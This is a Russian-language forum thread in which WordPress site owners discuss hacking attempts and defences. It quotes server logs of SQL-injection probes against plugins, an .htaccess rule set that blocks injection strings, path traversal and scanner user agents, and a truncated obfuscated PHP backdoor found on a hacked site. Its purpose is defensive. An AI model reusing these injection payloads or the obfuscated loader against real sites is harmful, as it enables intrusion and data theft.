Помощь Взламывают сайт, как лучше защититься?

[djchange]

Статистика показывает что постоянно хотят взломать сайт:
Что пытаются сделать этим кодом? я так понимаю лезут в админку? что хотят сделать?

     22:40:38 ->[404] /wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1
       22:40:49 ->[404] /wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1
       22:40:58 ->[404] /wp-content/plugins/all-video-gallery/conf(...)vid=1&pid=11&pid=-1+union+select+1+from+wp_users
       22:43:15 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html
       22:46:18 ->[404] /wp-content/plugins/wpSS/ss_handler.php?ss_id=-20 UNION ALL SELECT 1,2,3,4
       22:48:15 ->[404] /wp-content/plugins/fbgorilla/game_play.ph(...)user_login)*/),4,5,6,7,8,9,0,1,2,3+from+wp_users
       22:49:23 ->[404] /wp-content/plugins/contus-video-gallery/myextractXML.php
       22:49:52 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=0[ and 1=2]&type=html
       22:50:03 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=10000[ and 1=2]&type=html
       22:51:47 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and union+select+1+from+wp_users]&type=html
       22:51:56 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[and union+select+1+from+wp_users]&type=html
       22:52:03 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[and+union+select+1+from+wp_users]&type=html
       22:52:11 ->/wp-admin/admin-ajax.php?action=go_view_object&v(...)[and+union+select+login+from+wp_users]&type=html
       22:52:20 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=and+union+select+login+from+wp_users&type=html
       22:52:27 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=
       22:52:33 ->/wp-admin/admin-ajax.php
       22:52:39 ->/wp-admin/admin.php
       22:52:41 ->/wp-login.php?redirect_to=http://мой-сайт.com/wp-admin/admin.php&reauth=1
       22:52:43 ->/
       22:52:47 ->/detect/
       22:52:48 ->/wp-admin/admin-ajax.php
       22:54:55 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=18
       22:55:01 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=2
       22:55:06 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=3
       22:55:10 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=5
       22:55:16 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=7
       22:55:22 ->/
       22:55:25 ->/detect/
       22:56:49 ->/
       22:57:05 ->/wp-admin/admin-ajax.php?action=go_view_object&viewid=7

Чем защититься чтобы таким образом не ломали?

 

[SieOK]

по моему опыту - лучшее решение только закрытие стандартной админки (перенос на новый адрес) и неиспользование типовых логинов админа "admin", "superuser", "moderator" и пр. Хотя если поступил прямой заказ (а не просто брут) от конкурентов - будут использоваться все методы для получения доступа: взлом почты, перехват паролей вирусом с компьютера, атака на сервер и т.д.

Не только от конкурентов настоящих, но и начинающих в этой теме. Причем выглядит предельно просто: на фриланс-сайте начинающий владелец будущего магазина обращается к профи копипастерам просто наполнить магазин товаром от тебя как донора контента. Он ищет копирайтеров. Но ему поступает предложение проф. программиста (освоившего 3-4 книги лет 5 назад:
- PHP5 в примерах (+PHP6)_Стивен Хольцнер
- PHP4_Проф. РНР прогр-е_Аргерих
- PHP5. Проф прогр-е_Э. Гутманс и др
-PHP5_Проф прогр-е_Шлосснейгл
)
=Наполню быстро и недорого=
Все, твой сайт взломан, хоть на уязвимостях используемой CMS, хоть на уровне Апача или другого ПО, хоть на уровне операционной системы. Единственное - тихонько взломан с целью кражи базы данных.

Нужно почаще заходить вот сюда Для просмотра ссылки Войди или Зарегистрируйся и при этом спать спокойно

 

[Singularity]

Нашел интересный код, для защиты сайта средствами htaccess. Автор утверждает что протестировано на WordPress и Joomla и полет нормальный, есть эксперты, которые прокомментируют актуальность использования сего чуда, плюсы и минусы?

.htaccess against MySQL injections and other hacks
MySQL injection attempts are one of the most common hacking attacks against PHP websites. If your website is hosted on a dedicated or virtual server, the best solution is to your server hardened with proper mod_security rules. However, if you're on shared hosting, this is not an option. If you now think that it's not possible to protect your website against various hacking methods on shared hosting, you're wrong. Although it's not possible to use advanced strategies to protect your website, you're still able to protect it against hacking attempts using .htaccess rules. To implement such a protection, append your current .htaccess file with the following code, or create a new file called .htaccess, if you don't use any yet, and place it in your website's main folder:

#####################################################

# Script: htaccess Security #

# Version: 1.0 #

# ### Changelog ### #

# v1.0 - 2012-02-14 #

#####################################################

# No web server version and indexes

ServerSignature Off

Options -Indexes


# Enable rewrite engine

RewriteEngine On


# Block suspicious request methods

RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK|DEBUG) [NC]

RewriteRule ^(.*)$ - [F,L]


# Block WP timthumb hack

RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]

RewriteRule . - [S=1]


# Block suspicious user agents and requests

RewriteCond %{HTTP_USER_AGENT} (libwww-perl|wget|python|nikto|curl|scan|java|winhttp|clshttp|loader) [NC,OR]

RewriteCond %{HTTP_USER_AGENT} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]

RewriteCond %{HTTP_USER_AGENT} (;|<|>|'|"|\)|\(|%0A|%0D|%22|%27|%28|%3C|%3E|%00).*(libwww-perl|wget|python|nikto|curl|scan|java|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner) [NC,OR]

RewriteCond %{THE_REQUEST} \?\ HTTP/ [NC,OR]

RewriteCond %{THE_REQUEST} \/\*\ HTTP/ [NC,OR]

RewriteCond %{THE_REQUEST} etc/passwd [NC,OR]

RewriteCond %{THE_REQUEST} cgi-bin [NC,OR]

RewriteCond %{THE_REQUEST} (%0A|%0D) [NC,OR]


# Block MySQL injections, RFI, base64, etc.

RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]

RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]

RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR]

RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR]

RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR]

RewriteCond %{QUERY_STRING} ftp\: [NC,OR]

RewriteCond %{QUERY_STRING} http\: [NC,OR]

RewriteCond %{QUERY_STRING} https\: [NC,OR]

RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR]

RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR]

RewriteCond %{QUERY_STRING} ^(.*)cPath=Для просмотра ссылки Войди или Зарегистрируйся [NC,OR]

RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]

RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]

RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]

RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR]

RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]

RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR]

RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]

RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]

RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR]

RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR]

RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR]

RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]

RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]

RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]

RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]

RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR]

RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|convert|alter|declare|order|script|set|md5|benchmark|encode) [NC,OR]

RewriteCond %{QUERY_STRING} (sp_executesql) [NC]

RewriteRule ^(.*)$ - [F,L]


# Deny browser access to config files



Order allow,deny

Deny from all

#Allow from 1.2.3.4



It should work fine with most PHP scripts and has been tested with WordPress and Joomla!. If you want to run your install.php or directly access a config file with your browser, remove the hash symbol at the end of the file before "Allow from 1.2.3.4" and replace "1.2.3.4" with your external IP. .htaccess files will only work with Apache and LiteSpeed.

 

[turbopower]

Стандартные работы по защите:
настройка .htaccess
переименовать адрес страницы логина
изменить логин админа (чтобы не admin)
каппча на логин
установить кол-во попыток авторизации
можно сменить префикс полей БД с wp_ на другой

кстати, да
отлично работает
всегда меняю префиксы и редирекчу страницу логина

самое забавное наблюдать многотысячные запросы ботов-школодротов "wp-чего-то-там" в логах битрикса.
хотя и битрикс не без греха, курил эксплойтдатабейс...

 

[alex-forever90]

Я использую Wordfence Security, логин всегда не admin, этого достаточно в 99% случаев.

 

[Adynnor]

+ 1 на безопасности Wordfence я использовал это в течение очень долгого времени и это имеет очень хорошую защиту.

 

[paradox-ds]

Я обычно еще в довесок к защите Для просмотра ссылки Войди или Зарегистрируйся антивирус ставлю, если все таки взломают и зальют шел, можно отследить что и куда залили.

 

[Zheleznov]

Wordfence использую тоже достаточно давно, часто шлёт письма о разных попытках взломать сайт, даже слишком часто, это маленько вводит в замешательство.. т.к. зачем например взламывать самый простой не рабочий сайт "точнее рабочий но заброшенный" у которого посещения 1 человек в месяц..

 

[paradox-ds]

Wordfence использую тоже достаточно давно, часто шлёт письма о разных попытках взломать сайт, даже слишком часто, это маленько вводит в замешательство.. т.к. зачем например взламывать самый простой не рабочий сайт "точнее рабочий но заброшенный" у которого посещения 1 человек в месяц..

Да просто ломают обычно по шаблону сразу кучу сайтов. Сканируются сайты, если находится незакрытая дыра происходит взлом и заливается какой-нибудь шел, и все это в автоматическом режиме. А потом уже взломщик смотрит, что за сайт и что с ним делать (а может и сразу заливаться шел под определенную задачу. Обычно сайт превращают в спам-сервер и от вашего имени каждый день уходят тонны корреспонденции с предложением что-нибудь увеличить А могут использовать для взлома соседних сайтов, для дос-атак могут использовать, да мало ли зачем, применений много найдется. И ваш заброшенный сайтик будет работать на чужого дядю.

 

[denosx]

Ломанули сайт (( нашел в коде вот этот скрипт

<?php $g___g_='base'.(32*2).'_de'.'code';$g___g_=$g___g_(str_replace("\n", '', 'Ea/EtkD6Bkrw5RoligIzO3EOSY6e+1/EIoKbgxr9FzFP44WAOKwKodCREnS957yAzTOvGSuH0s7wc7+i
1hzIIju4vHm313XxQMDQmN8Hy/gyoXQcg0wEkPAPwgr+bzbyLveAkXr2nhdBqF6N1Yg5Fg6lRH9W9PYj
/9mqve+3cOBk0SwwmCdXE36aNt/Yg9q0EsC4AuCbBbfpTbOJjwjPltCAnw65QHv7NReU42r4jCvqJpoY
1fNNJhNDskTelk2D8prr7QZ/ofulktpyZRkCbVZpxTgKe62T1qQIOzfmoD60ZvQxGi6IM/Xf73a4jmVa
KCfajw0pmDvZYQeQgPGq2S3TIavxF9mDp73tLjCehcXDvhDkLFGxYO/NmTsrwlau/T5qj33kCfuK6i0A
2ro0xjv0GpSLLtxmcwLmi2XHMi86IYQemBXzPl2a6bUBi6wQgfbcmlJRbNIheN3m4YxzfnLa/1xWQHk7
X3+7SAtVzjvVhbfkVU0HaW3MRppUiM87RqD+KMeUqySyziaqZdfnJ9/1ELCQbBBYm4sW+37u+HFR6C/H
pL7031z/fkYxkJw7dmHbYpPAj/

Как можно его расшифровать?

Желательно понять, что он мог отправить и к чему он имел доступ

 

[rakstudio]

Скорее всего это попытки залить "Шела",для защиты от такой напасти советую плагин- Worffence
Ссылочка- Для просмотра ссылки Войди или Зарегистрируйся